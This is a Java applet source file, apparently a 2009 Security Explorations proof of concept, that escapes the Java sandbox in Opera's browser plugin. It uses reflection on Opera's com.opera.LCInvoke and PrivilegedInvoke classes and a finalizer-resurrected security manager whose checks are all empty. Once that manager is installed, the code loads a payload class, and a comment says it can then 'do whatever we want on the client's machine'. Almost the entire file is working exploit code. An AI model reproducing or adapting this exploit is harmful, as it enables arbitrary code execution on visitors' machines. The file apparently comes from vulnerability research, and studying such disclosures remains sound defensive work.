/*## (c) SECURITY EXPLORATIONS    2009 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.net.*;
import java.io.*;
import java.applet.*;
import java.security.*;

public class BlackBox extends Applet {
  public static SecurityManager msm;

  public class MySecurityManager extends SecurityManager {
    public void finalize() {
     msm=this;
    }

    public void checkPermission(Permission permission) {
    }

    public void checkPermission(Permission permission, Object obj) {
    }

    public void checkCreateClassLoader() {
    }

    public void checkAccess(Thread thread) {
    }

    public void checkAccess(ThreadGroup threadgroup) {
    }

    public void checkExit(int i) {
    }

    public void checkExec(String s) {
    }

    public void checkLink(String s) {
    }

    public void checkRead(FileDescriptor filedescriptor) {
    }

    public void checkRead(String s) {
    }

    public void checkRead(String s, Object obj) {
    }

    public void checkWrite(FileDescriptor filedescriptor) {
    }

    public void checkWrite(String s) {
    }

    public void checkDelete(String s) {
    }

    public void checkConnect(String s, int i) {
    }

    public void checkConnect(String s, int i, Object obj) {
    }

    public void checkListen(int i) {
    }

    public void checkAccept(String s, int i) {
    }

    public void checkMulticast(InetAddress inetaddress) {
    }

    public void checkMulticast(InetAddress inetaddress, byte byte0) {
    }

    public void checkPropertiesAccess() {
    }

    public void checkPropertyAccess(String s) {
    }

    public boolean checkTopLevelWindow(Object obj) {
     return true;
    }

    public void checkPrintJobAccess() {
    }

    public void checkSystemClipboardAccess() {
    }

    public void checkAwtEventQueueAccess() {
    }

    public void checkPackageAccess(String s) {
    }

    public void checkPackageDefinition(String s) {
    }

    public void checkSetFactory() {
    }

    public void checkMemberAccess(Class class1, int i) {
    }

    public void checkSecurityAccess(String s) {
    }
  }

  public BlackBox() {
   try {
    ClassLoader cl=getClass().getClassLoader();

    System.out.println("Security manager = "+System.getSecurityManager());

    URLClassLoader ucl=URLClassLoader.newInstance(new URL[0]);
    Class c=ucl.loadClass("com.opera.LCInvoke");

    Class aclass[]=new Class[3];
    aclass[0]=Class.forName("java.lang.reflect.Method");
    aclass[1]=Class.forName("java.lang.Object");
    aclass[2]=Class.forName("[Ljava.lang.Object;");

    Method invoke=c.getMethod("invoke",aclass);

    c=Class.forName("java.lang.Class");
    Method getctors=c.getMethod("getDeclaredConstructors",new Class[0]);

    c=ucl.loadClass("com.opera.PrivilegedInvoke");

    Object args[]=new Object[3];
    args[0]=getctors;
    args[1]=c;
    args[2]=new Object[0];
    
    Constructor cons=((Constructor[])invoke.invoke(null,args))[0];

    c=Class.forName("java.lang.reflect.Constructor");
    aclass=new Class[1];
    aclass[0]=Class.forName("[Ljava.lang.Object;");
    
    Method newinstance=c.getMethod("newInstance",aclass);

    c=Class.forName("java.lang.System");
    aclass=new Class[1];
    aclass[0]=Class.forName("java.lang.SecurityManager");

    Method setsm=c.getMethod("setSecurityManager",aclass);

    try {
     new MySecurityManager();
    } catch(Throwable e) {}

    while(msm==null) System.gc();

    Object setsmargs[]=new Object[1];
    setsmargs[0]=msm;

    Object consargs[]=new Object[3];
    consargs[0]=null;
    consargs[1]=setsm;
    consargs[2]=setsmargs;
    
    Object tmpargs[]=new Object[1];
    tmpargs[0]=consargs;
    
    args[0]=newinstance;
    args[1]=cons;
    args[2]=tmpargs;

    PrivilegedExceptionAction pa=(PrivilegedExceptionAction)invoke.invoke(null,args);

    AccessController.doPrivilegedWithCombiner(pa);

    System.out.println("Security manager = "+System.getSecurityManager());

    /* from now on we can do whatever we want on the client's machine */
    c=cl.loadClass("Beyond");
    c.newInstance();

   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
}
